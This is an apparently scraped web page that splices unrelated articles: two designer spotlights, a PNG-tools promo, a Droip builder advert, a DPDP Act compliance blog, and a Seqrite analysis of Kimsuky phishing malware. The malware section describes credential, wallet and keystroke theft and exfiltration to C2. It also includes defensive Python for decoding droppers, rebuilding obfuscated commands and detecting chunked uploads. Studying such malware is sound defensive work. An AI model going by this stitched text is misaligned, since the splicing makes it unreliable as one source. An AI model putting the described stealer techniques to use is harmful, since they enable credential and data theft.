In past Developer Spotlights, we’ve featured devs who’ve pushed the craft of building award-winning websites. But web development is more than just translating great design—Max Barvian is one of those pioneering devs who have a deep understanding of the core mechanics of frontend development. In 2024, he shared one of the coolest CSS-powered, scroll-driven animations with us here on Codrops. We can’t shine the light enough on Max, as his work represents the next frontier in web development—one that merges deep technical knowledge with creative experimentation.
Hi! My name is Max Barvian. I’m a UI engineer currently working at Clerk.
NumberFlow is an animated number component for React, Vue, Svelte, and vanilla TS/JS. It was heavily inspired by the number animations in the wonderful Family app:
The inspiration for NumberFlow. Video by Benji Taylor.
The response to NumberFlow has been surreal. 𝕏 is currently using it for their analytics dashboard, and Elon Musk even retweeted this screenshot of it:
When it came time to rebuild my portfolio last year, my goal was to make some combination of Godly and the Apple TV home screen. I’d really wanted a site like that for years, with a grid of project videos that smoothly transitioned into detail pages, but never felt confident about pulling it off. Then I found the View Transitions API. Despite its shortcomings (i.e. no interruption handling), it felt like the perfect tool for the job. View Transitions using snapshots of “old” views seemed perfect for the video grid, and meant I wouldn’t have to worry about animating a bunch of <video> elements at the same time. Ultimately, I had to use a few more tricks to get decent performance during the transitions, but I still can’t imagine having built the site with anything else. I was honored when Googlers Addy Osmani and Una Kravets shared my little site as a demo for View Transitions.
I stumbled upon this incredible design by Kevin Pham on Dribbble a couple years ago and immediately fell in love with it. I had wanted to experiment with CSS Scroll Snapping and 3D scenes for a while, and this seemed like the perfect candidate. I ended up using React Three Fiber, Motion for React, and Tailwind to implement it. It’s not perfect (there’s a pesky bug with mobile Safari on the last slide that I haven’t been able to fix), but I’m pretty happy with how it turned out. I was honored when Guillermo Rauch, Paul Henschel, Matt Perry, and Three.js all reposted it.
This work is probably the most boring on the list but I’m still happy with it. I was working on a Tailwind plugin for CSS clamp() when I encountered some longstanding accessibility issues with fluid type. I didn’t want to bring those issues into my plugin, so I spent a whole Sunday watching math videos on YouTube and talking to my physicist brother to figure out how to work around them. I eventually published the results in Smashing Magazine with some help from their great editors there, and was honored to see Adrian Roselli reference the work in his original article. Utopia, a popular fluid clamp generator, also integrated the findings into their tool.
About me
I got into creative development in a 7th grade journalism class, when my teacher made me the webmaster for our school newspaper. I asked my parents for Dreamweaver that year for Christmas and got my first freelance client a year after that. I’ve since moved on from Dreamweaver 🙂, but I’ve never wanted to do anything else professionally. I feel lucky that I’ve been able to make a career out of my passion.
Current challenges
At Clerk I’m working on building the component library we use for our dashboard. It’s been a fun challenge to try to build something that equally emphasizes UX and DX! I hope to share more on 𝕏 as it progresses. React Aria Components has been a huge inspiration here.
Tools
I basically live in VS Code writing React, Tailwind, and Motion code all day.
Philosophy
Someone I follow on 𝕏 thought NumberFlow was a good example of a quote by Charlie Munger:
“Take a simple idea and take it seriously.” —Charlie Munger
That’s stuck with me over the last few months, and I think it’s increased my enjoyment of projects I previously would’ve dismissed as too routine or boring.
It’s an honor to be featured on a site I’ve been reading my whole career. Thanks a lot, Manoela and the Codrops team!
Yesterday Online PNG Tools smashed through 6.32M Google clicks and today it’s smashed through 6.33M Google clicks! That’s 10,000 new clicks in a single day – the smash train keeps on rollin’!
What Are Online PNG Tools?
Online PNG Tools offers a collection of easy-to-use web apps that help you work with PNG images right in your browser. It’s like a Swiss Army Knife for anything PNG-related. On this site, you can create transparent PNGs, edit icons, clean up logos, crop stamps, change colors of signatures, and customize stickers – there’s a tool for it all. The best part is that you don’t need to install anything or be a graphic designer. All tools are made for regular people who just want to get stuff done with their images. No sign-ups, no downloads – just quick and easy PNG editing tools.
Who Created Online PNG Tools?
Online PNG Tools were created by me and my team at Browserling. We’ve built simple, browser-based tools that anyone can use without needing to download or install anything. Along with PNG tools, we also work on cross-browser testing to help developers make sure their websites work great on all web browsers. Our mission is to make online tools that are fast, easy to use, and that are helpful for everyday tasks like editing icons, logos, and signatures.
Who Uses Online PNG Tools?
Online PNG Tools and Browserling are used by everyone – from casual users to professionals and even Fortune 100 companies. Casual users often use them to make memes, edit profile pictures, or remove backgrounds. Professionals use them to clean up logos, design icons, or prepare images for websites and apps.
India’s retail sector is undergoing a significant digital transformation, with e-commerce, loyalty programs, and personalized marketing becoming the norm. This evolution means retailers are collecting and processing vast amounts of customer data, making compliance with the Digital Personal Data Protection (DPDP) Act 2023 a business necessity.
This blog explores why the DPDP Act is critical for the Indian retail ecosystem, highlighting its role in strengthening customer trust, enhancing data security, and ensuring responsible data management. By aligning with this legislation, retailers can meet regulatory requirements and differentiate themselves through stronger data governance and transparency.
Building Stronger Customer Relationships Through Trust
Customer trust is a critical business asset in today’s competitive retail landscape. The DPDP Act grants consumers (Data Principals) key rights over their data, including access, correction, and erasure under specific conditions. By aligning with the DPDP Act’s compliance framework, retailers can reinforce their commitment to data privacy and transparency, strengthening customer relationships.
These principles enhance brand credibility and foster long-term customer loyalty, positioning retailers as responsible data stewards in an evolving digital marketplace.
Ensuring Data Security in a Digital Marketplace
The retail sector faces growing cybersecurity risks, with data breaches potentially exposing sensitive customer information such as payment details and contact data. Under the DPDP Act, as Data Fiduciaries, retailers must implement robust security measures to prevent breaches and promptly notify the Data Protection Board of India and affected customers in case of an incident.
By prioritizing compliance-driven data security, retailers can mitigate cyber risks, protect customer information, and safeguard brand reputation, ensuring long-term business resilience in an increasingly digital landscape.
Promoting Fair and Transparent Data Practices
The DPDP Act enforces key principles like purpose limitation and data minimization. It requires retailers to collect only necessary data for defined purposes—such as processing transactions or personalizing offers—and retain it only as long as needed.
By adopting transparent data practices, retailers can ensure ethical data usage, reduce compliance risks, and enhance customer confidence. The Act also mandates clear customer notifications on data collection and usage, reinforcing trust and regulatory accountability in an increasingly data-driven retail landscape.
Ensuring Regulatory Compliance in a Growing Sector
The DPDP Act establishes a comprehensive legal framework for data protection, which is crucial for India’s rapidly expanding retail industry. Compliance ensures that retailers meet regulatory standards for processing digital personal data, mitigating risks of penalties and legal liabilities.
By aligning with the Act’s requirements, retailers can reinforce their commitment to ethical data practices, enhance customer trust, and operate with greater transparency and accountability in the evolving digital marketplace.
Empowering Consumers with Control Over their Data
The DPDP Act grants consumers the right to access, correct, and request the erasure of their digital personal data held by retailers. To ensure compliance, businesses must implement efficient mechanisms for handling these requests within the legal framework.
By prioritizing consumer data rights, retailers can enhance transparency, strengthen accountability, and foster trust, allowing customers to make informed decisions about the data they share—ultimately improving brand credibility and customer engagement.
Key Compliance Obligations for Retailers under the DPDP Act
Retailers must align with several critical obligations under the DPDP Act 2023 to ensure compliance and data protection:
Obtaining Informed Consent: Customer consent is required to process personal data, including marketing and loyalty programs.
Implementing Security Measures: Strong technical and organizational controls must safeguard customer data, such as secure access to corporate resources and endpoint protection.
Data Breach Notification: Any data breaches must be promptly reported to the Data Protection Board and affected customers.
Data Retention Policies: Clear policies must ensure customer data is retained only as long as necessary for its intended purpose.
Handling Data Principal Rights Requests: Efficient processes should be in place to manage customer requests for data access, correction, and erasure.
Potential Appointment of a Data Protection Officer (DPO): Large retailers classified as Significant Data Fiduciaries may be required to appoint a DPO for compliance oversight.
Navigating the Path to DPDP Compliance in Retail
Retailers must take a proactive approach to ensure compliance with the DPDP Act. This includes conducting a comprehensive assessment of current data processing practices and updating privacy policies to align with regulatory requirements.
Staff training on data privacy protocols and investing in data privacy management systems are essential. Additionally, retailers must establish clear procedures for obtaining and managing customer consent, ensuring compliance, transparency, and enhanced customer trust in the digital marketplace.
Building a Privacy-First Retail Ecosystem
The Digital Personal Data Protection Act 2023 is pivotal in strengthening data security and trust in India’s retail sector. The Act enhances customer relationships and industry integrity by enforcing responsible data handling, empowering consumers, and prioritizing privacy compliance.
Retailers who proactively adopt DPDP Act compliance fulfill legal requirements and gain a competitive edge by showcasing their commitment to customer data protection. Seqrite offers comprehensive data protection solutions to help retailers navigate compliance complexities and implement robust security frameworks. Contact us or visit our website for information.
Kimsuky: A Continuous Threat to South Korea with Deceptive Tactics
Contents
Introduction
Infection Chain
Initial Findings
Campaign 1
Looking into PDF document.
Campaign 2
Looking into PDF document.
Technical Analysis
Conclusion
Seqrite Protection
MITRE ATT&CK
IOCs
Introduction:
Security researchers at Seqrite Labs have recently uncovered two distinct campaigns carried out by the APT group “Kimsuky,” also known as “Black Banshee.” This group has been actively targeting South Korea using evolving tactics. In these campaigns, the threat actors delivered two South Korean government-themed documents as lures, specifically targeting government entities within South Korea.
In this blog, we delve into the technical details of the campaigns uncovered during our analysis. We examine the various stages of infection, starting with a phishing email carrying an LNK (shortcut) file attachment. The LNK file was designed to drop an obfuscated VBA (Visual Basic for Applications) script. After de-obfuscating the script, we found that it was responsible for dropping two additional files: one PDF file and one ZIP file. The ZIP file contained four malicious files: two log files (1.log and 2.log), one VBA script (1.vba), and one PowerShell script (1.ps1). Both campaigns involved the same set of malicious files.
Infection Chain:
Fig. 1 Infection chain
Initial Findings:
Campaign-1:
In the first campaign, we identified a document concerning tax reduction and tax payment relating to revenue, which carried the same malicious LNK attachment. This attachment subsequently deployed a malicious VBScript, facilitating further compromise.
Fig. 2 Revanue.pdf file
Based on our initial findings, we discovered that the adversary utilized a different document containing the same LNK file content.
Campaign-2:
In campaign 2, we learned that South Korea has enacted a new policy aimed at preventing recidivism among sex offenders. The initiative involves circulating a detailed document outlining the regulations, which was shared with households, daycare centers, kindergartens, and various local administrative offices, including township and village authorities, as well as neighbourhood community centres. Threat actors are exploiting this dissemination process by sending deceptive emails containing harmful attachments, targeting residential recipients and key personnel at local offices.
Fig. 3 Sex Offender Personal Information Notification.pdf
The adversaries have exploited the distribution of this information and document by circulating it via email, disguised under the filename 성범죄자 신상정보 고지.pdf.lnk (Sex Offender Personal Information Notification.pdf.lnk). This attachment contains a malicious LNK file, which poses a cybersecurity threat to the recipients.
Technical Analysis and Methodology:
Campaign 1 & 2:
We downloaded the file named 28f2fcece68822c38e72310c911ef007f8bd8fd711f2080844f666b7f371e9e1.lnk from campaign 1 and “성범죄자 신상정보 고지.pdf.lnk” (Sex Offender Personal Information Notification.pdf.lnk) from campaign 2, both of which were shared via email. During analysis, the LNK file appears to fetch additional files from an external C2 server, as shown in the snapshot below.
Fig. 4 Downloading VBScript from C2 (campaign 1)
Fig. 5 Downloading VBScript from C2 (campaign 2)
The file was downloaded from the URL provided above and saved into the Temp folder, as indicated below.
Fig. 6 Downloaded into the Temp folder (campaign 1)
Fig. 7 Downloaded into the Temp folder (campaign 2)
The file downloaded from the C2 server appears to be an obfuscated VBScript. Upon de-obfuscating the script, we discovered two additional files: one PDF and one ZIP file.
Fig. 8 Obfuscated VBScript
The first section of the file is encoded in Base64 strings.
Fig. 9 Base64-encoded PDF
After decoding, we found one PDF file.
Fig. 10 PDF after decoding
The second part of the VBScript is also encoded in Base64. After decoding it, we discovered a ZIP file.
Fig. 11 ZIP file
Fig. 12 Detect It Easy
The ZIP archive contains the files listed below.
Fig. 13 Inside the ZIP file
Within the ZIP archive, four files were identified: a VBScript, a PowerShell script, and two Base64-encoded text files. These encoded text files house obfuscated data, which, upon further dissection, may yield critical intelligence regarding the malware’s functionality and objectives. The following figures illustrate the encoded content of the two text files, which will be subsequently decoded and analysed to elucidate the next phase in the attack chain.
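The decoding steps above (two Base64 sections, one yielding a PDF and one a ZIP) can be automated for triage. The following Python script is an added example, not code from Seqrite's report: it carves long Base64 runs out of a dropper script, decodes them, classifies each by magic bytes, and lists ZIP members without writing anything to disk. The embedded sample script, PDF bytes and ZIP contents are constructed here; only the member names mirror those the report lists.

```python
import base64
import io
import re
import zipfile

# Constructed stand-in for the obfuscated dropper described in the report: a script
# holding two long Base64 strings. This is not the real sample.
SAMPLE_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"

def build_sample_zip() -> bytes:
    # Member names mirror the ones the report lists; contents are placeholders.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name in ("1.vbs", "1.ps1", "1.log", "2.log"):
            zf.writestr(name, f"placeholder content for {name}\n")
    return buf.getvalue()

SAMPLE_SCRIPT = (
    "Dim a, b\n"
    'a = "' + base64.b64encode(SAMPLE_PDF).decode() + '"\n'
    'b = "' + base64.b64encode(build_sample_zip()).decode() + '"\n'
    "' ... decode a and b and write them to disk ...\n"
)

# Magic-byte signatures for the two file types the report found embedded.
MAGIC = {b"%PDF": "pdf", b"PK\x03\x04": "zip"}

# A Base64 run long enough to be a payload rather than a short string literal.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def identify(data: bytes) -> str:
    """Classify a decoded blob by its leading bytes."""
    for sig, label in MAGIC.items():
        if data.startswith(sig):
            return label
    return "unknown"

def carve_blobs(script_text: str) -> list:
    """Decode every long Base64 run in the script and report what it is.
    ZIP blobs also get their member list, so the dropped file set is visible
    without extracting anything."""
    found = []
    for m in B64_RUN.finditer(script_text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:
            continue  # not valid Base64 (e.g. a long identifier)
        entry = {"offset": m.start(), "size": len(raw), "type": identify(raw)}
        if entry["type"] == "zip":
            with zipfile.ZipFile(io.BytesIO(raw)) as zf:
                entry["members"] = zf.namelist()
        found.append(entry)
    return found

if __name__ == "__main__":
    for blob in carve_blobs(SAMPLE_SCRIPT):
        print(blob)
```

Run it against any text dropper; blobs typed "unknown" still get reported with their size and offset so that nothing decodable is silently skipped.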
Fig. 14 1.log file with Base64 encoding
Fig. 15 2.log file with Base64 encoding
The 1.vbs file employs advanced obfuscation techniques, utilizing the chr() and CLng() functions to dynamically construct characters and invoke commands at runtime. This strategy effectively circumvents signature-based detection mechanisms, allowing the script to evade detection during execution.
Once the script finishes, the concatenated characters form a complete command, which is then executed. This command is likely designed to invoke the 1.ps1 PowerShell script, passing 1.log as an argument for further processing.
Fig. 16 1.vbs
Upon de-obfuscating the VBScript, we uncovered the following command-line execution, which subsequently triggers the PowerShell script for further processing.
Fig. 17 De-obfuscated VBScript
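The Chr()/CLng() construction described above can be resolved statically, which is safer than running the script to see what it builds. The Python below is an added example, not part of the report: it evaluates Chr() concatenation chains (decimal or "&H" hex literals, with or without a CLng() wrapper), rewrites them as string literals, and counts Chr() calls as a triage heuristic. The sample VBScript is constructed in the style the report describes; the rebuilt command only mirrors what the report states (1.ps1 invoked with 1.log as its argument), and its exact flags are an assumption.

```python
import re

def obfuscate_like_sample(text: str) -> str:
    """Constructed helper: spell a string out as Chr(CLng(...)) calls joined with '&',
    alternating decimal and &H hex literals so both forms are exercised."""
    parts = []
    for i, ch in enumerate(text):
        lit = f'"&H{ord(ch):X}"' if i % 2 else str(ord(ch))
        parts.append(f"Chr(CLng({lit}))")
    return " & ".join(parts)

# Constructed sample, not the real 1.vbs.
SAMPLE_VBS = (
    "Dim cmd\n"
    "cmd = " + obfuscate_like_sample("powershell -File 1.ps1 1.log") + "\n"
    'CreateObject("WScript.Shell").Run cmd, 0, False\n'
)

# One Chr() call: Chr(CLng(<lit>)) or Chr(<lit>), where <lit> is decimal or "&Hxx".
_LIT = r'("?&H[0-9A-Fa-f]+"?|\d+)'
_CHR_SRC = (r'(?:Chr\s*\(\s*CLng\s*\(\s*' + _LIT + r'\s*\)\s*\)'
            r'|Chr\s*\(\s*' + _LIT + r'\s*\))')
CHR_CALL = re.compile(_CHR_SRC, re.IGNORECASE)
# A chain of such calls joined by VBScript's '&' concatenation operator.
CHR_CHAIN = re.compile(_CHR_SRC + r'(?:\s*&\s*' + _CHR_SRC + r')*', re.IGNORECASE)

def _lit_to_int(lit: str) -> int:
    lit = lit.strip('"')
    return int(lit[2:], 16) if lit[:2].upper() == "&H" else int(lit)

def resolve_chr_chain(expr: str) -> str:
    """Evaluate a Chr()/CLng() concatenation chain without executing anything."""
    return "".join(chr(_lit_to_int(m.group(1) or m.group(2)))
                   for m in CHR_CALL.finditer(expr))

def deobfuscate(script: str) -> str:
    """Replace every Chr() chain in the script with the string literal it builds."""
    def repl(m):
        return '"' + resolve_chr_chain(m.group(0)).replace('"', '""') + '"'
    return CHR_CHAIN.sub(repl, script)

def chr_call_count(script: str) -> int:
    """Triage heuristic: benign scripts rarely spell out whole commands with Chr();
    dozens of calls in a short script warrant a closer look."""
    return len(CHR_CALL.findall(script))

if __name__ == "__main__":
    print("Chr() calls:", chr_call_count(SAMPLE_VBS))
    print(deobfuscate(SAMPLE_VBS))
```

The resolver deliberately handles only literal arguments; if a sample computes character codes arithmetically (e.g. CLng(x + 3)), the chain is left untouched rather than guessed, and the unresolved call count still flags it.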
Upon executing the 1.vbs file, it triggered the invocation of the 1.ps1 file, as illustrated in the snapshot below.
Fig. 18 Executing 1.vbs
The 1.ps1 script includes a function designed to decode Base64-encoded data from the 1.log file and execute the resulting script.
Fig. 19 1.ps1 file
Fig. 20 1.log after decoding
The 1.ps1 script retrieves the BIOS serial number, a unique system identifier, from the compromised host. This serial number is subsequently used to create a dedicated directory within the system’s temporary folder, ensuring that attack-related files are stored in a location specific to the compromised machine, as shown in the snapshot above.
As a VM-aware sample, the script checks if it is executing within a virtual machine environment. If it detects a virtual machine, it will delete all four files associated with the attack (1.vbs, 1.ps1, 1.log, and any payload files stored in the directory named after the serial number), effectively halting its execution, as illustrated.
The script encompasses 11 functions that define the subsequent phases of the malware’s operation, which include data exfiltration, cryptocurrency wallet information theft, and the establishment of Command-and-Control (C2) communications. These functions are integral to the attack’s execution, facilitating the malware’s objectives and ensuring persistent communication with the threat actor.
List of malicious functions retrieved from the 1.log file:
UploadFile():
The upload function exfiltrates data by transmitting it to the server in 1MB chunks, allowing it to handle large file sizes efficiently. The script awaits a response from the server, and if it receives an HTTP status code of “200,” it proceeds with further execution. If the response differs, the script terminates its operation. Each chunk is sent via an HTTP POST request, with the function verifying the success of each upload iteration before continuing.
Fig. 21 UploadFile()
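The fixed 1 MB chunking described for UploadFile() is itself a network signature: a host issuing repeated POSTs whose bodies sit at exactly the chunk size, ending with one smaller tail. The Python below is an added example, not code from the report, that runs such a check over constructed web-proxy records (all hosts, paths and timestamps are made up); a practitioner would feed it parsed proxy or web-server logs with the same field names.

```python
from collections import defaultdict

MIB = 1024 * 1024

def _rec(ts, src, dst, method, path, req_bytes, status):
    return {"ts": ts, "src": src, "dst": dst, "method": method,
            "path": path, "req_bytes": req_bytes, "status": status}

# Constructed proxy records (not real telemetry). Host 10.0.0.15 pushes a ~4.2 MB
# file as 1 MiB POST pieces plus a short tail; the rest is ordinary traffic.
SAMPLE_RECORDS = [
    _rec("2025-03-01T09:00:01", "10.0.0.15", "203.0.113.7", "POST", "/upload", MIB, 200),
    _rec("2025-03-01T09:00:02", "10.0.0.15", "203.0.113.7", "POST", "/upload", MIB, 200),
    _rec("2025-03-01T09:00:03", "10.0.0.22", "198.51.100.4", "GET", "/index.html", 0, 200),
    _rec("2025-03-01T09:00:04", "10.0.0.15", "203.0.113.7", "POST", "/upload", MIB, 200),
    _rec("2025-03-01T09:00:05", "10.0.0.15", "203.0.113.7", "POST", "/upload", MIB, 200),
    _rec("2025-03-01T09:00:06", "10.0.0.15", "203.0.113.7", "POST", "/upload", 200_000, 200),
    _rec("2025-03-01T09:00:07", "10.0.0.22", "198.51.100.4", "POST", "/api/form", 4_096, 200),
    # a lone 1 MiB post plus a tail (e.g. a photo upload) stays below the threshold
    _rec("2025-03-01T09:00:08", "10.0.0.30", "198.51.100.9", "POST", "/photos", MIB, 200),
    _rec("2025-03-01T09:00:09", "10.0.0.30", "198.51.100.9", "POST", "/photos", 700_000, 200),
]

def find_chunked_uploads(records, chunk=MIB, min_full_chunks=3, slack=0.01):
    """Group POSTs by (source, destination, path) and flag groups whose request
    bodies repeatedly sit at the chunk size. A single smaller trailing body is the
    expected last piece of a file split into fixed-size chunks."""
    groups = defaultdict(list)
    for r in records:
        if r["method"].upper() == "POST":
            groups[(r["src"], r["dst"], r["path"])].append(r)
    lo, hi = chunk * (1 - slack), chunk * (1 + slack)
    findings = []
    for (src, dst, path), posts in groups.items():
        posts.sort(key=lambda r: r["ts"])
        full = [r for r in posts if lo <= r["req_bytes"] <= hi]
        if len(full) < min_full_chunks:
            continue
        findings.append({
            "src": src, "dst": dst, "path": path,
            "posts": len(posts), "full_chunks": len(full),
            "bytes": sum(r["req_bytes"] for r in posts),
            "first": posts[0]["ts"], "last": posts[-1]["ts"],
            # the report notes the script stops on any non-200 reply, so a
            # completed run normally shows only 200s
            "all_200": all(r["status"] == 200 for r in posts),
        })
    return findings

if __name__ == "__main__":
    for f in find_chunked_uploads(SAMPLE_RECORDS):
        print(f)
```

Tune chunk and slack to the size the sample actually uses (the report says 1 MB; whether that is 1,000,000 or 1,048,576 bytes is not stated, so both are worth trying), and raise min_full_chunks in environments where legitimate chunked uploads to known services are common.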
GetExWFile():
The GetExWFile function iterates through a set of predefined hash tables containing cryptocurrency wallet extensions. When a match is found, it identifies the associated “.ldb” and “.log” files linked to those extensions for exfiltration. These files are subsequently copied to the destination folder specified by the $Storepath variable.
Fig. 22 GetExWFile()
GetBrowserData():
The script checks whether any of the following browsers—Edge, Firefox, Chrome, or Naver Whale—are actively running, to extract user profile data, including cookies, login credentials, bookmarks, and web data. Prior to collecting this information, the script terminates the browser processes to ensure uninterrupted access. It then proceeds to retrieve data on installed extensions and cache files, such as webcacheV01.dat, for each identified browser. For certain browsers, it also performs decryption operations to unlock encrypted keys, allowing it to extract sensitive information, which is then stored alongside the decrypted master encryption key.
Fig. 23 GetBrowserData()
Download file():
The download file function downloads any file based on the C2 command.
Fig. 24 Download file()
RegisterTask():
It creates persistence for the files “1.log” and “1.vbs”.
Fig.25 RegisterTask()
Send():
The send () function uploads all the collected information to the server after compressing the data into a ZIP file named “init.zip”. It then renames the ZIP file to “init.dat” and deletes all backup files from the system after uploading.
Fig. 26 Send()
The execution flow of the functions follows a sequence where several actions are carried out within the attack. Among these functions, one triggers another PowerShell command that calls the 2.log file, which is responsible for performing keylogging activities.
Fig. 27 Flow of execution of functions and the command to execute “2.log”
Fig. 28 Executing the 2.log file
Fig. 29 Inside the 2.log file
The decoded content of the 2.log file is shown above. It contains a script that imports essential Windows API functions for detecting key presses, retrieving window titles, and managing keyboard states. The script executes actions such as clipboard monitoring, keystroke logging, and recording window titles.
Fig. 30.2 Code for clipboard monitoring.
Conclusion
As observed, threat actors are utilizing time-consuming, multi-component techniques that are interlinked to enhance their evasiveness. Unlike other stealers, this one primarily focuses on network-related information, which could be leveraged for active reconnaissance. Given that the stealer targets sensitive user data, it is crucial to protect yourself with a reputable security solution such as Seqrite Antivirus in today’s digital landscape. At Seqrite Lab, we provide detection capabilities for such stealers at various stages of infection, along with protection against the latest threats.
Seqrite Protection:
Trojan.49424.SL
Trojan.49422.C
MITRE ATT&CK:
Initial Access
T1566.001: Phishing: Spearphishing Attachment
Execution
T1059.001: Command and Scripting Interpreter: PowerShell
T1059.005: Command and Scripting Interpreter: Visual Basic
Persistence
T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Defense Evasion
T1140: Deobfuscate/Decode Files or Information
Credential Access
T1555.003: Credentials from Password Stores: Credentials from Web Browsers
Meet Stephanie Bruce, an Independent Designer and Webflow Developer based in London, UK. She has been designing for over 2 years, previously working in Finance.
She loves editorial layouts, photography and visually creative web designs. She works closely with agencies and clients worldwide.
In this spotlight, Stephanie shares a selection of her favorite projects — a window into her creative process, inspirations, and evolution as a designer.
Featured work
Valentine
This is my latest project where I did the art direction, photography direction, web design and development for Freewrite Valentine. The main purpose of the website is to promote their latest Freewrite Valentine, paying tribute to the original Olivetti Valentine typewriter.
I used retro ads and posters as the main inspiration for the web design and photography direction. We decided to go with a bold red colour throughout the website to emphasise the retro red vibes. I had a two-week deadline to design and build, as well as photography direction.
MOD Agency Collab
A web design project I did at MOD agency, with creative director Matt Jumper. My role was to design the website and create data visuals. It was my first time designing data visuals and I was pretty happy with how fun they turned out. Huge thanks to Mod agency for bringing me along for this project.
SP28K
SP28K was an exploration website I did on the Flow Party On Demand course. For this design I decided to explore brutalist design with a touch of editorial layout. This project challenged me to go for a bold approach using expressive typography and high-contrast fonts. Photoshoot of the speaker was done in Spline.
Concepts and explorations
Outside of client work, I love spending time creating my own concepts and web design explorations. By creating concept work, I learnt how much I love editorial, photography based websites and how I hope to attract similar work in the near future.
Especially being a relatively new designer, these concepts have helped me get noticed on social media and led to many opportunities.
Brief biography and career highlights
I switched careers from Finance to Design over two years ago. I wanted to find a job that I loved, and once I discovered the world of Digital Design, I became pretty obsessed. I feel like I found my calling.
When I worked in Finance, I spent a lot of my spare time immersed in the creative world. I would go to exhibitions, galleries, theatre plays, etc. I also studied Photography, which helped me develop an eye for detail and composition. I feel that the combination of my exposure to the arts and my photography skills has played a big role in developing a strong visual eye for design.
Since changing careers, I’ve had some amazing opportunities to work with leading designers and agencies — from a six-month internship with Fons Mans to collaborations with designers like Dann Petty and Benten Woodring.
I’ve been freelancing since the beginning of my design career and am very grateful that my work and network have led to multiple collaborations with international clients and agencies.
Inspiration
I find that most of my inspiration comes from looking at design outside of web design. I often look at magazine layouts, prints/posters, and branding assets. Exploring these areas challenges me to create things you don’t typically see on websites.
I also draw a lot of inspiration from visiting art galleries and exhibitions around London, as well as from films and video games like Firewatch and Before Your Eyes.
Future Goals
Currently, I’m focused on working with agencies, as I enjoy collaborating and learning as much as possible from them.
In the near future, I’d love to work with lifestyle and e-commerce clients, and maybe team up with someone to create a purposely small, boutique agency.
Message to Readers
Put in the time to practice design, and get comfortable with sharing your work online and networking — it can lead to so many opportunities and collaborations.
I’d also say it’s totally fine to explore different skills at the beginning, but I recommend committing to mastering one or two that truly excite you. Stay open to learning and keep pushing yourself to improve, no matter how many years of experience you have.
Feel free to reach out to me on Twitter or Instagram — whether you have a project in mind or just want to grab a coffee, in person or online!
Let’s be real—building a WordPress site with traditional page builders can feel like assembling IKEA furniture with missing pieces.
You install a page builder only to find out it doesn’t do half the things you need. So you pile on plugins to fill the gaps, and they end up conflicting with one another.
Your site slows down, SEO takes a hit, and suddenly, you’re knee-deep in subscription fees, support tickets, and messy workarounds.
It’s 2025. We deserve better.
That era of outdated page builders and plugin-heavy setups is over.
Today’s web demands speed, flexibility, and full creative control—minus the bloat and the added costs. That’s where Droip comes in. A new kind of builder made for modern creators.
But what makes it unique? Let’s break it down.
All-in-One Web Building Ecosystem
Droip is a full-fledged, no-code ecosystem that lets you build smarter.
Whether it’s SEO, forms, popups, dynamic content, or even image editing, Droip handles it natively.
Because it’s all native, your site stays lean, fast, and conflict-free. Oh, and your wallet? It stays happy too.
What that means for you:
No surprise costs or upgrade traps.
Faster load times and better performance.
One support team, one solution.
Scales with your business—whether you’re a solo creator or running a full agency.
Pricing: It’s transparent, with no hidden upsells. Check the Pricing page for the details.
To learn how Droip works, watch a quick video overview of Droip in action.
Modern UI With Maximum Control
Let’s start with the UI.
The moment you open the editor, everything feels intuitive.
It’s sleek. It’s modern. It’s not that stiff, clunky layout you’ve seen in other WordPress builders.
Instead, the editor gives you an interface that feels familiar, like the modern major web builders you already know, but packs the kind of power only Droip can deliver.
Everything’s exactly where you expect it to be.
The menu panels are clean and concise. Element settings are instantly accessible.
The UX flows effortlessly, from dragging elements to switching panels; it’s all frictionless.
And yes, it also has both dark and light modes for your comfort.
Overall, it provides a clean, smooth workspace designed to help you move fast and build without barriers.
Design Freedom For Everyone
When it comes to design, Droip hands you the keys to total design freedom.
Whether you’re starting from scratch or using predesigned layouts, you have all the flexibility and options.
A Growing Collection of Stunning Templates
Start with Droip’s growing collection of stunning templates, from sleek portfolios to bold business sites. They’re professionally designed, fully customizable, and included in your subscription (no sneaky extra fees)!
Pre-Made Sections, Pages, and Components
Mix and match ready-made sections, pages, and components like contact forms, testimonials, cards, and more. It’s like having a design toolkit at your fingertips. Just drag, drop, customize if needed, and you’re all set.
Turn Figma Designs into Fully Editable Pages—In Seconds
Imagine dragging in your Figma mockup and watching it become a live, editable page in seconds. If you’ve got your site designed in Figma, you can just copy and paste it into Droip—yes, literally.
The builder instantly converts it into a fully editable, auto-responsive page with a single click. And the best part? It automatically adapts to all breakpoints, including any custom ones you define.
Want to Start from Scratch? Go for It!
If you’re the “I want full control” type, Droip’s intuitive drag-and-drop canvas is all yours. Build pixel-perfect layouts, experiment, and make it yours.
Droip was built with the atomic approach to give you granular control over every aspect of your website. With deep element editing, you can adjust every detail, from typography to layouts, to fit your exact vision.
Native Dynamic Content. No ACF Required.
Managing dynamic content in WordPress usually means extra plugins like ACF. Not anymore.
Droip lets you create, manage, and style dynamic content like listings, directories, and portfolios right out of the box.
Connect your content, customize it visually, and even set dynamic SEO for every item’s detail page. All built-in and all visual.
A Smarter Media Manager That Works Like a Design Tool
Droip’s media manager is not just for organizing images.
You can crop, resize, add filters, or create custom text paths all inside Droip’s powerful native media manager.
Image Editing Tools
One of the standout features of Droip’s media manager is its advanced image editing capabilities.
Edit your images directly within Droip, from basic cropping and resizing to applying advanced filters, without relying on third-party tools.
Text Path Creation
Another innovative feature is the ability to create text paths. This allows you to design text that follows any path or shape for that extra creative edge.
Extensive Icons & Shapes library
Droip has an extensive library of shapes so you can do more than ever.
You can leverage an array of distinctive shapes, customize them to create unique visuals, and effortlessly add them to any part of your website.
Plus, it also houses a vast collection of high-quality icons, all ready to be refined to perfection.
Instant Global Styling Sync with Variables
Most builders make global styling difficult with scattered controls. But this WordPress builder has a dedicated feature called Variables that allows you to save and apply reusable styles across your entire site.
The system is centralized and features a real-time preview, meaning you can update your design in seconds. Say you want to tweak your brand’s primary color. Change it once, and Droip updates every button, heading, and section styled with that variable instantly.
You can also create multiple styling modes, such as light and dark themes, and switch between them with a single click—perfect for seasonal refreshers or theme updates.
Reusable Components with Symbols
Droip also comes with a feature called Symbols, which lets you turn any element along with all of its nested children into a reusable component.
That means if you build something once, like a button, a pricing card, or even an entire section, you can reuse it throughout the site.
